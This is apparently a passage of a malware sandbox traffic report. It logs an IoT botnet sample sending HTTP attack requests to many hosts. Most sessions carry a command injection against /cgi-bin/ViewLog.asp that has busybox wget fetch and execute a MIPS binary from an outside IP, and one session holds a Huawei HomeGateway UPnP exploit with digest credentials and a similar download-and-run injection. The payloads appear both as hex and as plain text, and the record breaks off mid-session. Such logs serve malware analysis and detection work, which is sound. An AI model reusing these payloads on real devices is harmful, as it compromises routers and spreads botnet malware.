                                              Nov 23, 2023 05:15:01.709664106 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:02.726732969 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:03.942723989 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:06.534709930 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:11.398689032 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:21.126729965 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:40.582611084 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:19.494518995 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              20192.168.2.133594031.134.48.1588080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:01.723619938 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:01.937509060 CET399INHTTP/1.0 302 Redirect
                                              Date: Sun, 28 Mar 2021 04:39:09 GMT
                                              Server: Boa/0.94.14rc21
                                              Accept-Ranges: bytes
                                              Connection: close
                                              Content-Type: text/html; charset=ISO-8859-1
                                              Location: http://192.168.0.14:80/login.htm
                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 52 65 64 69 72 65 63 74 3c 2f 48 31 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 6c 6f 67 69 6e 2e 68 74 6d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                              Data Ascii: <HTML><HEAD></HEAD><BODY><H1>302 Redirect</H1>The document has moved<A HREF="login.htm">here</A>.</BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21192.168.2.136087494.187.118.1938080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:01.730400085 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22192.168.2.136023894.121.107.578080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:01.731131077 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23192.168.2.134635694.121.184.1918080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:01.731430054 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24192.168.2.134886094.122.90.268080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:01.738918066 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              25192.168.2.135733695.216.217.678080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:01.905442953 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:02.105523109 CET1025INHTTP/1.1 404
                                              Content-Type: text/html;charset=utf-8
                                              Content-Language: en
                                              Content-Length: 775
                                              Date: Thu, 23 Nov 2023 04:15:01 GMT
                                              Keep-Alive: timeout=20
                                              Connection: keep-alive
                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 5b 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 5d 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 31 30 2e 30 2e 32 30 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [&#47;cgi-bin&#47;ViewLog.asp] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/10.0.20</h3></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              26192.168.2.135044294.120.248.248080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:01.957938910 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              27192.168.2.1349764156.77.134.14337215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:04.380760908 CET886OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 74.50.84.203 -l /tmp/kh -r /webos/whoareyou.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              28192.168.2.134732462.234.30.628080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:05.550683975 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:05.879786968 CET171INHTTP/1.1 200 OK
                                              Content-Type: application/json
                                              content-length: 34
                                              Data Raw: 7b 22 63 6f 64 65 22 3a 35 30 30 2c 22 6d 73 67 22 3a 22 34 30 34 20 4e 4f 54 5f 46 4f 55 4e 44 22 7d
                                              Data Ascii: {"code":500,"msg":"404 NOT_FOUND"}


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              29192.168.2.134324494.123.242.38080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:05.779695988 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              30192.168.2.133737894.253.42.1008080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:06.105609894 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
